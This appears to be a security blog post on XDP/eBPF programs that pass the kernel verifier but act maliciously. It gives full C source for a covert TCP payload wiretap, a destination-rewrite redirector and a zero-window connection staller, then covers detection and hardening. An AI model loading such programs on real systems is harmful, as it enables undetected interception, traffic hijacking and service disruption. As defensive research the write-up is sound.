Verified, Not Safe: XDP Programs the Kernel Trusts
I wrote an XDP program last week. Loaded it with bpf_prog_load, attached it to eth0. The verifier walked every path through the bytecode, checked my bounds, checked my helper calls, and returned 0. Clean load.
I ran bpftool prog list and there it was—sitting alongside systemd's cgroup programs and the container runtime's socket filters. One more entry in a list of twenty. If you scrolled past it, you'd assume it was a monitoring tool. Some observability thing. It wasn't. It was copying the first 128 bytes of every TCP payload into a ring buffer.
The verifier didn't flag it. It couldn't. The verifier's job is to prove my program won't crash the kernel. It doesn't have an opinion about what I do with packet data once I've proven I'll access it safely.
All of this requires root, or CAP_BPF plus CAP_NET_ADMIN for XDP. An attacker with root can already load kernel modules, ptrace processes, rewrite binaries. But BPF is different in one way: it looks normal. A kernel module shows up in lsmod. A modified binary fails a hash check. A BPF program sits in a list of twenty other BPF programs and looks identical to the one next to it.
I wanted to understand where the line actually is.
Four programs the verifier loves
All four compile with clang -O2 -target bpf. All four load cleanly.
Silent drop
XDP runs before the kernel allocates an sk_buff. Return XDP_DROP for packets matching a destination port: no socket buffer, no netfilter hook, nothing for tcpdump to see. I sent traffic to port 4443 and watched tcpdump. Nothing. Not a SYN, not a RST. The only evidence was ethtool -S counters—the NIC saw the packets, the kernel didn't.
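The drop logic is small enough to model in userspace. What follows is a sketch under assumptions, not the program that was loaded: verdict_for_frame, the verdict enum, and the byte-offset parsing are names and choices made up for illustration, and the enum values only mirror XDP_DROP (1) and XDP_PASS (2) from linux/bpf.h. The length checks before each read are the same shape of bounds check the verifier insists on.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical verdicts; values mirror XDP_DROP and XDP_PASS in linux/bpf.h. */
enum verdict { VERDICT_DROP = 1, VERDICT_PASS = 2 };

/* Userspace model of a drop-by-destination-port decision for one
 * Ethernet frame spanning [data, data_end). Assumes no VLAN tags. */
static enum verdict verdict_for_frame(const uint8_t *data,
                                      const uint8_t *data_end,
                                      uint16_t drop_port)
{
    const size_t eth_len = 14;
    size_t frame_len = (size_t)(data_end - data);

    /* Ethernet plus a minimal IPv4 header must fit before any read. */
    if (frame_len < eth_len + 20)
        return VERDICT_PASS;

    /* EtherType sits at bytes 12..13, big-endian; 0x0800 is IPv4. */
    if (data[12] != 0x08 || data[13] != 0x00)
        return VERDICT_PASS;

    const uint8_t *ip = data + eth_len;
    size_t ip_hlen = (size_t)(ip[0] & 0x0F) * 4; /* IHL counts 32-bit words */
    if (ip_hlen < 20 || ip[9] != 6)              /* protocol 6 is TCP */
        return VERDICT_PASS;

    /* A minimal TCP header must fit before the ports are read. */
    if (frame_len < eth_len + ip_hlen + 20)
        return VERDICT_PASS;

    const uint8_t *tcp = ip + ip_hlen;
    uint16_t dport = (uint16_t)((tcp[2] << 8) | tcp[3]);

    return dport == drop_port ? VERDICT_DROP : VERDICT_PASS;
}
```

In an XDP program the same checks would run against ctx->data and ctx->data_end, and the drop verdict would be a plain return XDP_DROP.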
Passive wiretap
The drop program was visible in one way: the connection failed. The client knew something was wrong. So I tried the opposite—what if traffic flows normally and I just watch?
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#define TAP_LEN 128 /* bytes of payload copied per packet */

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 20); /* 1 MiB */
} tap_rb SEC(".maps");

SEC("xdp")
int xdp_tap(struct xdp_md *ctx) {
    void *data = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    /* Every header is bounds-checked before it is read. */
    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    /* IHL and data offset are both counted in 32-bit words. */
    __u32 ip_hlen = ip->ihl * 4;
    struct tcphdr *tcp = (void *)ip + ip_hlen;
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    __u32 tcp_hlen = tcp->doff * 4;
    void *payload = (void *)tcp + tcp_hlen;
    if (payload >= data_end)
        return XDP_PASS;

    /* Only tap packets carrying at least TAP_LEN bytes of payload. */
    __u32 pay_off = (__u32)((void *)tcp - data) + tcp_hlen;
    if (pay_off + TAP_LEN > (__u32)(data_end - data))
        return XDP_PASS;

    void *buf = bpf_ringbuf_reserve(&tap_rb, TAP_LEN, 0);
    if (!buf)
        return XDP_PASS;

    /* A reserved record must be submitted or discarded on every path. */
    if (bpf_xdp_load_bytes(ctx, pay_off, buf, TAP_LEN) < 0) {
        bpf_ringbuf_discard(buf, 0);
        return XDP_PASS;
    }
    bpf_ringbuf_submit(buf, 0);
    return XDP_PASS;
}

char LICENSE[] SEC("license") = "GPL";
This one returns XDP_PASS. Traffic flows normally. Nobody's connection breaks. But every TCP segment carrying at least 128 bytes of payload gets its first 128 bytes copied into a BPF_MAP_TYPE_RINGBUF before the kernel's network stack even touches it. A userspace process reads the ring buffer at its leisure.
I checked. ss didn't show it. lsof didn't show it. There's no file descriptor, no socket, no entry in /proc/net. The data path is entirely kernel-internal: XDP hook → ring buffer → mmap'd read. The only evidence is a map in bpftool map list that you'd have to think to look for.
Header rewrite
This is the one that surprised me. Not because it's complicated—because it's identical to legitimate infrastructure code.
I rewrote the destination IP, recomputed the checksum with the RFC 1624 incremental update, and called bpf_redirect to send the packet out a different interface.
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#define ORIG_DST 0x0A000164 /* 10.0.1.100 */
#define NEW_DST 0x0A000265 /* 10.0.2.101 */
#define OUT_IFIDX 4 /* ifindex of the egress interface */

/* RFC 1624 incremental update, HC' = ~(~HC + ~m + m'),
 * applied to one 32-bit field as two 16-bit words. */
static __always_inline void
update_csum(__u16 *csum, __be32 old_val, __be32 new_val) {
    __u32 s = (~(__u32)*csum & 0xFFFF)
            + (~((__u32)old_val >> 16) & 0xFFFF)
            + (~(__u32)old_val & 0xFFFF)
            + ((__u32)new_val >> 16)
            + ((__u32)new_val & 0xFFFF);
    /* Fold the carries back in twice, then complement. */
    s = (s & 0xFFFF) + (s >> 16);
    s = (s & 0xFFFF) + (s >> 16);
    *csum = (__u16)~s;
}

SEC("xdp")
int xdp_redirect_rewrite(struct xdp_md *ctx) {
    void *data = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->daddr != bpf_htonl(ORIG_DST))
        return XDP_PASS;

    /* Swap the destination and patch the IPv4 header checksum. */
    __be32 old_dst = ip->daddr;
    ip->daddr = bpf_htonl(NEW_DST);
    update_csum(&ip->check, old_dst, ip->daddr);

    /* This sketch leaves the Ethernet addresses and the TCP/UDP checksum
     * (which covers the destination address through the pseudo-header)
     * untouched; a complete NAT path rewrites both. */
    return bpf_redirect(OUT_IFIDX, 0);
}

char LICENSE[] SEC("license") = "GPL";
From the sender's side, everything looked normal. Packet left, ACK came back. From the original destination's side, the connection never happened. The packet showed up on a different interface, heading to a different host entirely.
Set this beside Cilium's XDP datapath or Facebook's Katran and the shape is the same: parse headers, match a condition, rewrite or encapsulate, fix up the checksum, send the packet on its way. The code that load-balances your production traffic and the code that silently reroutes it to an attacker's box use the same helpers, the same bounds checks, the same checksum fold. There is no syntactic tell.
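The incremental update is easy to get subtly wrong, so it is worth checking against a full recomputation. A minimal userspace sketch, assuming a 20-byte IPv4 header held as ten 16-bit words in one consistent byte order; csum_full and csum_update32 are names invented here, with csum_update32 following the same arithmetic as update_csum above. The sample header values are illustrative only.

```c
#include <stddef.h>
#include <stdint.h>

/* Full Internet checksum (RFC 1071) over n 16-bit words. */
static uint16_t csum_full(const uint16_t *words, size_t n)
{
    uint32_t s = 0;
    for (size_t i = 0; i < n; i++)
        s += words[i];
    /* Fold carries back into the low 16 bits, then complement. */
    s = (s & 0xFFFF) + (s >> 16);
    s = (s & 0xFFFF) + (s >> 16);
    return (uint16_t)~s;
}

/* RFC 1624 eq. 3, HC' = ~(~HC + ~m + m'), for a 32-bit field
 * treated as two 16-bit words. */
static uint16_t csum_update32(uint16_t csum, uint32_t old_val, uint32_t new_val)
{
    uint32_t s = (uint16_t)~csum;
    s += (uint16_t)~(old_val >> 16);  /* ~m, high word */
    s += (uint16_t)~old_val;          /* ~m, low word  */
    s += new_val >> 16;               /* m', high word */
    s += new_val & 0xFFFF;            /* m', low word  */
    s = (s & 0xFFFF) + (s >> 16);
    s = (s & 0xFFFF) + (s >> 16);
    return (uint16_t)~s;
}
```

If the incremental result and the recomputed checksum ever disagree for a given header, the fold or the complement is wrong somewhere, and the receiver will discard the rewritten packet.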
TCP window zero
I didn't drop anything. I didn't redirect anything. I changed a single field: the TCP window size. Set it to zero on incoming ACKs from a target port. XDP runs on ingress, so when the server on port 8080 sends an ACK back, the XDP program rewrites its window field to zero before the local TCP stack reads it. The local stack sees a zero window and enters persist mode per RFC 1122 §4.2.2.17, voluntarily holding back everything except window probes. The connection stays open. No RST, no FIN. netstat shows ESTABLISHED. Everything looks healthy. The data just stops flowing.
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#define TARGET_PORT 8080

/* RFC 1624 incremental update for a single 16-bit field. */
static __always_inline void
update_tcp_csum(__u16 *csum, __u16 old_val, __u16 new_val) {
    __u32 s = (~(__u32)*csum & 0xFFFF)
            + (~(__u32)old_val & 0xFFFF)
            + (__u32)new_val;
    /* Fold the carries back in twice, then complement. */
    s = (s & 0xFFFF) + (s >> 16);
    s = (s & 0xFFFF) + (s >> 16);
    *csum = (__u16)~s;
}

SEC("xdp")
int xdp_zero_window(struct xdp_md *ctx) {
    void *data = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    struct tcphdr *tcp = (void *)ip + (ip->ihl * 4);
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    /* Only touch ACKs arriving from the target port. */
    if (tcp->source != bpf_htons(TARGET_PORT))
        return XDP_PASS;
    if (!tcp->ack)
        return XDP_PASS;

    /* Advertise a zero window and keep the TCP checksum valid. */
    __u16 old_win = tcp->window;
    tcp->window = 0;
    update_tcp_csum(&tcp->check, old_win, 0);
    return XDP_PASS;
}

char LICENSE[] SEC("license") = "GPL";
The kernel's TCP stack doesn't know. XDP rewrote the incoming window field before the TCP code ever read it. The local side thinks the server's receive window is zero, so it stops sending. ss locally shows the send queue growing. Nobody dropped a packet. The connection is just frozen, waiting for a window update that arrives with the right value—but gets rewritten to zero again every time.
I sat there watching the send queue climb. A connection stall that no standard diagnostic on either side explains. No packet loss. No errors. Just a frozen pipe.
All four programs pass the verifier. All four are structurally identical to things you'd find in production—a load balancer rewrites headers, a firewall drops ports, a monitoring tool reads payloads, a traffic shaper adjusts windows. Same SEC("xdp"), same bounds checks, same helper calls. The only difference is what's on the other side of the ring buffer, or which IP address you're rewriting to, or why you picked that port number.
The haystack
After loading my wiretap program, I ran bpftool prog list to see what it looked like from the outside. I'd been testing on a Kubernetes node running Cilium, so there were already a lot of BPF programs loaded. This is what I saw:
$ bpftool prog list
6: cgroup_device tag a0d4b9c1d1f9 gpl
    loaded_at 2026-05-12T08:31:02+0000 uid 0
    xlated 504B jited 309B memlock 4096B
11: cgroup_skb tag 6deef7357e7b4530 gpl
    loaded_at 2026-05-12T08:31:02+0000 uid 0
    xlated 64B jited 54B memlock 4096B
12: cgroup_skb tag 6deef7357e7b4530 gpl
    loaded_at 2026-05-12T08:31:02+0000 uid 0
    xlated 64B jited 54B memlock 4096B
58: cgroup_device tag ee0e253c78993a24 gpl
    loaded_at 2026-05-12T08:31:14+0000 uid 0
    xlated 416B jited 255B memlock 4096B
173: xdp tag 8f06c7a58c442bc7 gpl
    loaded_at 2026-05-12T08:32:01+0000 uid 0
    xlated 1392B jited 788B memlock 4096B
    map_ids 14,15
174: sched_cls tag 3bc7abe41cce68c5 gpl
    loaded_at 2026-05-12T08:32:01+0000 uid 0
    xlated 17968B jited 9728B memlock 20480B
    map_ids 14,15,16,17
175: sched_cls tag 9a5b24def40c6967 gpl
    loaded_at 2026-05-12T08:32:01+0000 uid 0
    xlated 22120B jited 12043B memlock 24576B
    map_ids 14,15,16,17,18
212: xdp tag 5a3c0f0c4a3d7e9b gpl
    loaded_at 2026-05-12T09:14:33+0000 uid 0
    xlated 864B jited 492B memlock 4096B
    map_ids 21
340: cgroup_skb tag 6deef7357e7b4530 gpl
    loaded_at 2026-05-12T08:33:19+0000 uid 0
    xlated 64B jited 54B memlock 4096B
341: cgroup_skb tag 6deef7357e7b4530 gpl
    loaded_at 2026-05-12T08:33:19+0000 uid 0
    xlated 64B jited 54B memlock 4096B
389: cgroup_device tag a2b450ee44e80e5e gpl
    loaded_at 2026-05-12T08:33:44+0000 uid 0
    xlated 504B jited 309B memlock 4096B
415: sched_cls tag 7e21c72519aa452a gpl
    loaded_at 2026-05-12T08:34:02+0000 uid 0
    xlated 4200B jited 2311B memlock 4096B
    map_ids 14,15,16
472: tracepoint tag b0f0e9ea03d4acba gpl
    loaded_at 2026-05-12T08:35:11+0000 uid 0
    xlated 1288B jited 703B memlock 4096B
    map_ids 29
511: xdp tag e4f8c3a21d9b6f07 gpl
    loaded_at 2026-05-12T10:41:57+0000 uid 0
    xlated 712B jited 401B memlock 4096B
    map_ids 34
My wiretap is one of those entries. Which one?
They all have the same fields: type, tag hash, bytecode size, map IDs. Nothing distinguishes the implant from the rest.
I tried bpftool net list—that at least shows which programs are attached to which interfaces:
$ bpftool net list
xdp:
eth0(2) driver id 173
veth7a3f(8) generic id 212
eth1(3) driver id 511
tc:
eth0(2) clsact/ingress bpf_lxc id 174 tag 3bc7abe41cce68c5
eth0(2) clsact/egress bpf_lxc id 175 tag 9a5b24def40c6967
Better. But legitimate XDP programs attach to interfaces too. Cilium's datapath is on eth0. A network policy enforcer lives on a veth. A traffic monitor sits on eth1. My wiretap is on one of these interfaces and it looks exactly like the others.
Reading the bytecode
The only real way to know what a program does is to read it. I dumped the bytecode of my wiretap.
If you know what you're looking at, the tells are there. But I had to know to look for those patterns. And I wrote the program. If I were looking at someone else's bytecode—one of thirty programs on a production node, each with hundreds of instructions—would I spot the bpf_ringbuf_reserve buried in a flow that looks like a standard packet filter?
It gets worse. bpftool prog dump jited id 212 gives you the JIT'd native x86 instead of BPF bytecode. Now you're reading mov and call instructions with hex addresses. Even less readable.
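One way to make the reading less manual is to scan the translated dump for helper calls that move packet data somewhere else. The sketch below is only that, a sketch: it assumes dump lines shaped like "41: (85) call bpf_ringbuf_reserve#12345" (the exact text after the helper name can vary by kernel and bpftool version), and watched_helpers and watched_call are hypothetical names for this illustration. The helper names themselves are real BPF helpers.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical watchlist: helpers that copy packet data out of the
 * normal path or steer the packet elsewhere. */
static const char *const watched_helpers[] = {
    "bpf_ringbuf_reserve",
    "bpf_ringbuf_output",
    "bpf_perf_event_output",
    "bpf_xdp_load_bytes",
    "bpf_redirect",
};

/* Return the watched helper called on this dump line, or NULL.
 * Assumes the helper name directly follows the text "call ". */
static const char *watched_call(const char *line)
{
    const char *call = strstr(line, "call ");
    if (!call)
        return NULL;
    call += strlen("call ");

    size_t count = sizeof watched_helpers / sizeof watched_helpers[0];
    for (size_t i = 0; i < count; i++) {
        size_t n = strlen(watched_helpers[i]);
        /* The name must end at '#', a newline, or end of string, so that
         * bpf_redirect does not also match bpf_redirect_map. */
        if (strncmp(call, watched_helpers[i], n) == 0 &&
            (call[n] == '#' || call[n] == '\n' || call[n] == '\0'))
            return watched_helpers[i];
    }
    return NULL;
}
```

A hit is a reason to read the surrounding instructions, not a verdict: legitimate monitoring and load-balancing programs call exactly the same helpers.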
Most teams never look at any of this. The programs load, traffic flows, dashboards stay green.
Hardening
So what do you actually do about this?
kernel.unprivileged_bpf_disabled=1: the baseline. Unprivileged BPF has been off by default since kernel 5.16 (upstream ships the value 2, which an admin can flip back; 1 locks it off until reboot). Only root or a process holding CAP_BPF can load programs. If you're running anything older, set it now. Doesn't solve the problem described above, but shrinks the surface.
BPF LSM hooks: this is the more interesting one. Linux 5.7+ lets you write BPF programs that gate other BPF programs. You attach a policy to the bpf LSM hook that checks program type, attach target, or the calling process before allowing bpf_prog_load. SELinux has a dedicated bpf object class for this, and AppArmor can at least withhold the capabilities a loader needs. So you can say "only Cilium's binary, signed by this key, can load XDP programs on eth0." Everything else gets rejected at load time.
Signed BPF programs: there's been work toward loading programs signed against a keyring, where the loader checks the signature before the verifier even runs. Not fully mainlined yet, but it's the direction things are heading.
Baseline diffing: the simplest approach, and probably the most underused. Snapshot what's loaded, compare periodically:
# snapshot loaded programs and interface attachments into separate files
bpftool prog list --json > /var/log/bpf-prog-baseline.json
bpftool net list --json > /var/log/bpf-net-baseline.json
# later: diff the live state against each snapshot
diff <(jq -S . /var/log/bpf-prog-baseline.json) \
     <(bpftool prog list --json | jq -S .)
diff <(jq -S . /var/log/bpf-net-baseline.json) \
     <(bpftool net list --json | jq -S .)
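Diffing raw JSON is noisy, because program IDs and load times change every time an agent restarts. The tag is a hash of the program's instructions, so a baseline keyed on type and tag survives reloads as long as the bytecode is unchanged. A rough sketch of that comparison, assuming the (type, tag) pairs have already been extracted from bpftool's output; struct prog_entry, in_baseline, and unknown_progs are names invented for this example.

```c
#include <stddef.h>
#include <string.h>

/* One loaded program, reduced to the fields that survive a reload. */
struct prog_entry {
    const char *type; /* e.g. "xdp" */
    const char *tag;  /* hex tag as printed by bpftool */
};

/* Return 1 if (type, tag) appears in the baseline, 0 otherwise. */
static int in_baseline(const struct prog_entry *base, size_t n,
                       const struct prog_entry *p)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(base[i].type, p->type) == 0 &&
            strcmp(base[i].tag, p->tag) == 0)
            return 1;
    return 0;
}

/* Copy every entry of `now` that is missing from the baseline into `out`
 * (which must have room for nnow entries) and return how many were copied. */
static size_t unknown_progs(const struct prog_entry *base, size_t nbase,
                            const struct prog_entry *now, size_t nnow,
                            struct prog_entry *out)
{
    size_t k = 0;
    for (size_t i = 0; i < nnow; i++)
        if (!in_baseline(base, nbase, &now[i]))
            out[k++] = now[i];
    return k;
}
```

An unknown tag only says that something new is loaded. Deciding whether it belongs there still means reading it.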
| Detection command | What it reveals |
|---|---|
| bpftool prog list | All loaded programs, type, size, maps |
| bpftool net list | XDP and TC attachments per interface |
| bpftool prog dump xlated id N | BPF bytecode disassembly |
| bpftool prog dump jited id N | Native x86/ARM assembly |
| bpftool map list | All maps; look for unexpected ringbufs |
| sysctl kernel.unprivileged_bpf_disabled | Whether unprivileged users can load BPF |
| ausearch -k bpf | Audit log of BPF syscalls (if auditing enabled) |
None of these tell you what a program does. They tell you what's loaded. That gap—between knowing what's present and knowing what it's doing—is the whole problem.
Reading: